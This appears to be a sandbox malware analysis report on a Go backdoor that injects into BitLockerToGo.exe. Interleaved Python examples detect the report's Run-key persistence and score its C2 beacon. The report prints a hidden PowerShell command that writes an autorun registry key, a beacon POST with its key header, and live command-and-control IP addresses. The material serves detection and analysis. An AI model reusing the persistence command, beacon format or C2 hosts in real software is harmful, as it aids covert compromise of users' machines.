
Windows Analysis Report
BwqqVoHR71.exe

Overview

General Information

Sample name: BwqqVoHR71.exe (renamed by the sandbox because the original name is a hash value)
Original sample name: 0a21a94198f6157abb36bf55cb43be27.exe
Analysis ID: 1537033
MD5: 0a21a94198f6157abb36bf55cb43be27
SHA1: 9a01b5e8a68be2b49250c730f8c3ecaee3734170
SHA256: 53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
Tags: exe, user-abuse_ch

Detection

GO Backdoor
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GO Backdoor
AI detected suspicious sample
Allocates memory in foreign processes
Creates an autostart registry key pointing to binary in C:\Windows
Found Tor onion address
Injects a PE file into a foreign processes
Suspicious powershell command line found
Writes to foreign memory regions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • BwqqVoHR71.exe (PID: 7236 cmdline: "C:\Users\user\Desktop\BwqqVoHR71.exe" MD5: 0A21A94198F6157ABB36BF55CB43BE27)
    • BitLockerToGo.exe (PID: 7652 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 7728 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • BitLockerToGo.exe (PID: 7896 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
No configs have been found
Source | Rule | Description | Author | Strings
    Source: Process Memory Space: BitLockerToGo.exe PID: 7652 | Rule: JoeSecurity_GOBackdoor | Description: Yara detected GO Backdoor | Author: Joe Security
    Sigma source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
    Sigma source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 7652, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", ProcessId: 7728, ProcessName: powershell.exe
    No Suricata rule has matched
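The two Sigma hits describe one persistence chain: BitLockerToGo.exe (PID 7652, running the injected Go payload) spawns a hidden PowerShell (PID 7728) that writes HKCU\...\CurrentVersion\Run\App pointing back at C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe. As an added example, not part of the Joe Sandbox report and not the Sigma project's own code, the Python below re-implements the logic behind those two hits as plain functions, correlates the registry write with the process that made it, and walks the parent chain back to the sample. It runs over constructed Sysmon-style events whose field values for PIDs 7652 and 7728 are copied from the process tree and the Sigma details above; the PID 9001 event is made up as a benign control. The scripting-host and expected-parent lists, the reason labels and the rule names are this example's own assumptions. One check a responder will want that the report does not settle: the Run value points at the legitimate system path, and nothing here shows whether that file is replaced on disk, so hash C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe against a known-good copy rather than assume either way.

```python
"""Sigma-style checks for the two hits in the report, run over constructed Sysmon-style
events. Field values for PIDs 7652 and 7728 are copied from the process tree and the
Sigma hit details; the PID 9001 event is made up as a benign control. The host lists,
reason labels and rule names are this example's own assumptions."""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List

BLTG = r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
PS_EXE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# PowerShell command line exactly as the process tree shows it for PID 7728.
PS_CMD = r'''powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"'''

EVENTS: List[Dict] = [
    {"EventID": 1, "ProcessId": 7652, "ParentProcessId": 7236, "Image": BLTG,
     "CommandLine": '"' + BLTG + '"', "ParentImage": r"C:\Users\user\Desktop\BwqqVoHR71.exe"},
    {"EventID": 1, "ProcessId": 7728, "ParentProcessId": 7652, "Image": PS_EXE,
     "CommandLine": PS_CMD, "ParentImage": BLTG},
    {"EventID": 13, "ProcessId": 7728, "Image": PS_EXE, "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App",
     "Details": BLTG},
    # Constructed benign control: an operator running a one-off command from cmd.exe.
    {"EventID": 1, "ProcessId": 9001, "ParentProcessId": 9000, "Image": PS_EXE,
     "CommandLine": "powershell -NoProfile -Command Get-Process",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Assumed lists: interpreters that rarely have a legitimate reason to write Run values,
# and parents from which an interactive PowerShell is normally launched.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
EXPECTED_PS_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe", "code.exe"}


@dataclass
class Finding:
    rule: str
    pid: int
    reasons: List[str]
    chain: List[str] = field(default_factory=list)  # child first, root last


def norm(s: str) -> str:
    """Lower-case and collapse the doubled backslashes that PowerShell quoting produces."""
    return s.lower().replace("\\\\", "\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def rule_autorun_key_modification(ev: Dict) -> List[str]:
    """Sysmon EventID 13 SetValue on a CurrentVersion\\Run(Once) value."""
    if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
        return []
    if not re.search(r"\\currentversion\\run(once)?\\", norm(ev.get("TargetObject", ""))):
        return []
    reasons = ["autorun-key-set"]
    if basename(norm(ev.get("Image", ""))) in SCRIPT_HOSTS:
        reasons.append("set-via-scripting-host")
    if norm(ev.get("Details", "")).startswith("c:\\windows\\"):
        reasons.append("autorun-target-under-windows-dir")  # the report's own signature
    return reasons


def rule_suspicious_powershell(ev: Dict) -> List[str]:
    """Sysmon EventID 1 for PowerShell with a hidden window, an inline Run-key write, or an odd parent."""
    if ev.get("EventID") != 1 or basename(norm(ev.get("Image", ""))) not in {"powershell.exe", "pwsh.exe"}:
        return []
    cmd = norm(ev.get("CommandLine", ""))
    reasons = []
    if re.search(r"-w(indowstyle)?\s+hidden", cmd):
        reasons.append("hidden-window")
    if re.search(r"(set|new)-itemproperty", cmd) and "currentversion\\run" in cmd:
        reasons.append("run-key-write-in-cmdline")
    if basename(norm(ev.get("ParentImage", ""))) not in EXPECTED_PS_PARENTS:
        reasons.append("unusual-parent")
    return reasons


def process_chain(events: List[Dict], pid: int) -> List[str]:
    """Follow ParentProcessId through creation events; fall back to ParentImage when the
    parent was started before logging began (the sample itself has no EventID 1 here)."""
    by_pid = {e["ProcessId"]: e for e in events if e.get("EventID") == 1}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(basename(ev["Image"]))
        pid = ev.get("ParentProcessId")
        if pid not in by_pid and ev.get("ParentImage"):
            chain.append(basename(ev["ParentImage"]))
    return chain


RULES: List[Callable[[Dict], List[str]]] = [rule_autorun_key_modification, rule_suspicious_powershell]


def detect(events: List[Dict]) -> List[Finding]:
    """Apply every rule to every event; each hit carries the process chain for triage."""
    findings = []
    for ev in events:
        for rule in RULES:
            reasons = rule(ev)
            if reasons:
                findings.append(Finding(rule.__name__, ev["ProcessId"], reasons, process_chain(events, ev["ProcessId"])))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f.rule} pid={f.pid} reasons={f.reasons} chain={' <- '.join(f.chain)}")
```

On the report's events this yields two findings, both for PID 7728, each with the chain powershell.exe <- BitLockerToGo.exe <- BwqqVoHR71.exe; the benign PID 9001 control produces none. The backslash normalisation matters: the PowerShell command line carries `\\` inside its quoted string while the Sysmon registry event carries single backslashes, and a rule that does not collapse them will match one but not the other.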


    AV Detection

    Source: BwqqVoHR71.exe | ReversingLabs: Detection: 28%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.0% probability
    Source: BwqqVoHR71.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: BwqqVoHR71.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb | source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL | source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp

    Networking

    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp; BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000040F2000.00000004.00001000.00020000.00000000.sdmp; BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000050A6000.00000004.00001000.00020000.00000000.sdmp; BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000004AC3000.00000004.00001000.00020000.00000000.sdmp; BitLockerToGo.exe, 00000005.00000002.3047534110.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory (the same Go runtime and standard-library string table in all five dumps; in BitLockerToGo.exe it sits at the image base 0x400000, consistent with the PE-injection signatures above):
        GoneDATAPING<>1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir 
        Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: Joe Sandbox View | IP Address: 46.8.232.106
    Source: Joe Sandbox View | IP Address: 93.185.159.253
    Source: unknown | TCP traffic detected without corresponding DNS query: 50 events, none preceded by a DNS lookup, to five peers that also appear below as bare http:// IP strings in BitLockerToGo.exe memory:
        46.8.232.106      10 events
        46.8.236.61       10 events
        93.185.159.253    10 events
        91.212.166.91     11 events
        188.130.206.243    9 events
    Source: unknown | HTTP traffic detected:
        POST / HTTP/1.1
        Host: 46.8.232.106
        User-Agent: Go-http-client/1.1
        Content-Length: 162
        X-Api-Key: X2qB4QsF
        Accept-Encoding: gzip

        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
        Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
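The request above is the only HTTP exchange the report shows: a POST to a bare IP literal with Go's default User-Agent, a short X-Api-Key header, and a 162-byte body that contains no readable text. As an added example, not part of the report and not code from the malware or from Joe Sandbox, the Python below parses a raw HTTP/1.1 request and scores it on exactly those traits, using the captured headers and the 162 body bytes listed above as its sample input; a constructed benign request is included for contrast. The heuristics, their labels and the 30% control-byte threshold are this example's own assumptions. The last check is an observation, not a decryption: every body byte is below 0x60, which is what XOR of two printable-ASCII streams produces, so the payload is consistent with a keyed XOR of text, but nothing here recovers a key or plaintext. Two caveats from the strings section above belong with this beacon: the ".onion" that triggers the "Found Tor onion address" signature sits inside the Go standard-library string table ("listen.onionip+net"), so it is a property of the Go net package rather than evidence of a Tor address, and the observed peers are plain IPv4 literals; the same table also contains "yamux" and "socks5", library names consistent with tunnelling functionality.

```python
"""Heuristic scoring of a raw HTTP/1.1 request for beacon-like traits.
Sample input: the headers and 162 body bytes from the report's "HTTP traffic
detected" entry. The benign request and all thresholds/labels are this
example's own assumptions."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# The 162 body bytes exactly as listed under "Data Raw" in the report.
BEACON_BODY = bytes.fromhex(
    "18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c"
    " 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14"
    " 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23"
    " 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55"
    " 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14"
    " 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45"
    " 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e"
    " 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e"
    " 4b 1a"
)


def build_request(method: str, target: str, headers: List[Tuple[str, str]], body: bytes) -> bytes:
    """Serialise an HTTP/1.1 request the way a client puts it on the wire."""
    lines = [f"{method} {target} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


# Header names, values and order as captured in the report.
BEACON_REQUEST = build_request("POST", "/", [
    ("Host", "46.8.232.106"),
    ("User-Agent", "Go-http-client/1.1"),
    ("Content-Length", "162"),
    ("X-Api-Key", "X2qB4QsF"),
    ("Accept-Encoding", "gzip"),
], BEACON_BODY)

# Constructed benign request (not from the report) for contrast.
BENIGN_BODY = b'{"query": "status"}'
BENIGN_REQUEST = build_request("POST", "/api/v1/search", [
    ("Host", "api.example.com"),
    ("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0"),
    ("Content-Type", "application/json"),
    ("Content-Length", str(len(BENIGN_BODY))),
], BENIGN_BODY)

IPV4_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")
CONTROL_THRESHOLD = 0.30  # assumed: share of non-whitespace control bytes that marks a body as opaque


@dataclass
class Request:
    method: str
    target: str
    headers: Dict[str, str]  # names lower-cased
    body: bytes
    reasons: List[str] = field(default_factory=list)


def parse_request(raw: bytes) -> Request:
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers, body)


def analyze_request(raw: bytes) -> Request:
    """Attach a reason label for every beacon-like trait the request exhibits."""
    req = parse_request(raw)
    h = req.headers
    if IPV4_HOST.match(h.get("host", "")):
        req.reasons.append("host-is-ip-literal")
    if h.get("user-agent", "").startswith("Go-http-client/"):
        req.reasons.append("go-default-user-agent")
    if re.fullmatch(r"[A-Za-z0-9_-]{4,64}", h.get("x-api-key", "")):
        req.reasons.append("custom-api-key-header")
    declared = h.get("content-length", "")
    if declared.isdigit() and int(declared) != len(req.body):
        req.reasons.append("content-length-mismatch")  # truncated capture or lying client
    if req.body:
        control = sum(1 for b in req.body if b < 0x20 and b not in b"\t\r\n")
        if control / len(req.body) > CONTROL_THRESHOLD and "content-type" not in h:
            req.reasons.append("opaque-body-no-content-type")
        if max(req.body) < 0x60:  # XOR of two printable-ASCII streams never exceeds 0x5f
            req.reasons.append("body-in-printable-xor-range")
    return req


def is_beacon_like(raw: bytes, min_reasons: int = 3) -> bool:
    """Assumed triage threshold: three or more traits together are worth an analyst's time."""
    return len(analyze_request(raw).reasons) >= min_reasons


if __name__ == "__main__":
    for name, raw in (("beacon", BEACON_REQUEST), ("benign", BENIGN_REQUEST)):
        r = analyze_request(raw)
        print(f"{name}: {r.method} {r.target} host={r.headers.get('host')} reasons={r.reasons}")
```

The Content-Length check is the edge case worth keeping: a captured beacon that was cut off mid-body still scores on its headers, but the mismatch label tells the analyst that the body bytes are incomplete before anyone tries to decode them.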
    Source: BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmp | Strings found in memory (the five contacted peers, stored as bare http:// IP literals, which is why no DNS query precedes the traffic):
        http://188.130.206.243
        http://188.130.206.243http://46.8.232.106
        http://46.8.232.106
        http://46.8.236.61
        http://91.212.166.91
        http://93.185.159.253
    Source: BwqqVoHR71.exe | Strings found in binary (CRL, OCSP and repository URLs of the Certum code-signing and GlobalSign timestamping chains embedded in the file's Authenticode signature, which the static scan reports as invalid; trailing characters such as "0w" are adjacent DER bytes picked up by the string scanner):
        http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
        http://cevcsca2021.ocsp-certum.com07
        http://crl.certum.pl/ctnca2.crl0l
        http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        http://crl.globalsign.com/root-r6.crl0G
        http://ocsp.globalsign.com/ca/gstsacasha384g40C
        http://ocsp2.globalsign.com/rootr606
        http://repository.certum.pl/cevcsca2021.cer0
        http://repository.certum.pl/ctnca2.cer09
        http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        http://subca.ocsp-certum.com02
        http://www.certum.pl/CPS0
        https://www.certum.pl/CPS0
        https://www.globalsign.com/repository/0
    Source: BwqqVoHR71.exe | Strings found in binary (other URLs):
        https://picsum.photos/208/500
        https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02x
    Source: powershell.exe (process 6) | Strings found in memory (stock PowerShell, PackageManagement/NuGet and Pester strings belonging to the PowerShell process itself, not attributable to the sample):
        http://crl.microsoft (00000006.00000002.2006769465.00000000073AB000.00000004.00000020.00020000.00000000.sdmp)
        http://nuget.org/NuGet.exe (00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp)
        http://pesterbdd.com/images/Pester.png (00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmp)
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmp)
        http://www.apache.org/licenses/LICENSE-2.0.html (00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmp)
        https://aka.ms/pscore6lBfq (00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmp)
        https://contoso.com/ (00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp)
        https://contoso.com/Icon (00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp)
        https://contoso.com/License (00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp)
        https://github.com/Pester/Pester (00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmp)
        https://nuget.org/nuget.exe (00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp)
    Source: BwqqVoHR71.exe, 00000000.00000002.1992782995.0000000000D1E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: directInput8Creatememstr_d4ab7c7d-1
    Source: BwqqVoHR71.exe, 00000000.00000002.1992782995.000000000171E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: github.com/hajimehoshi/ebiten/v2/internal/glfw._GetRawInputDatamemstr_c3e7c151-8 (both the DirectInput8Create and GetRawInputData references come from the ebiten/glfw input layer compiled into the Go binary, which is what the two keystroke-capture signatures above key on)
    Source: BwqqVoHR71.exe | Static PE information: invalid certificate
    Source: BwqqVoHR71.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename BITLOCKERTOGO.EXEj% vs BwqqVoHR71.exe (the version resource claims the name of the legitimate Windows binary the sample injects into)
    Source: BwqqVoHR71.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000040F2000.00000004.00001000.00020000.00000000.sdmp; BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002D08000.00000004.00001000.00020000.00000000.sdmp; BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000050A6000.00000004.00001000.00020000.00000000.sdmp; BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000004AC3000.00000004.00001000.00020000.00000000.sdmp; BitLockerToGo.exe, 00000005.00000002.3047534110.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .vbpb
    Source: classification engine | Classification label: mal84.troj.evad.winEXE@7/3@0/5
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\Users\user\AppData\Local\config
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkt2sm3n.qgx.ps1 (PowerShell's own start-up policy probe, not a script dropped by the sample)
    Source: BwqqVoHR71.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: BwqqVoHR71.exeReversingLabs: Detection: 28%
    Source: BwqqVoHR71.exe | String found in binary or memory: net/addrselect.go
    Source: BwqqVoHR71.exe | String found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/data/address.go
    Source: BwqqVoHR71.exe | String found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/address.go
    Source: BwqqVoHR71.exe | String found in binary or memory: github.com/magiconair/properties@v1.8.6/load.go
    Source: BwqqVoHR71.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: unknown | Process created: C:\Users\user\Desktop\BwqqVoHR71.exe "C:\Users\user\Desktop\BwqqVoHR71.exe"
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
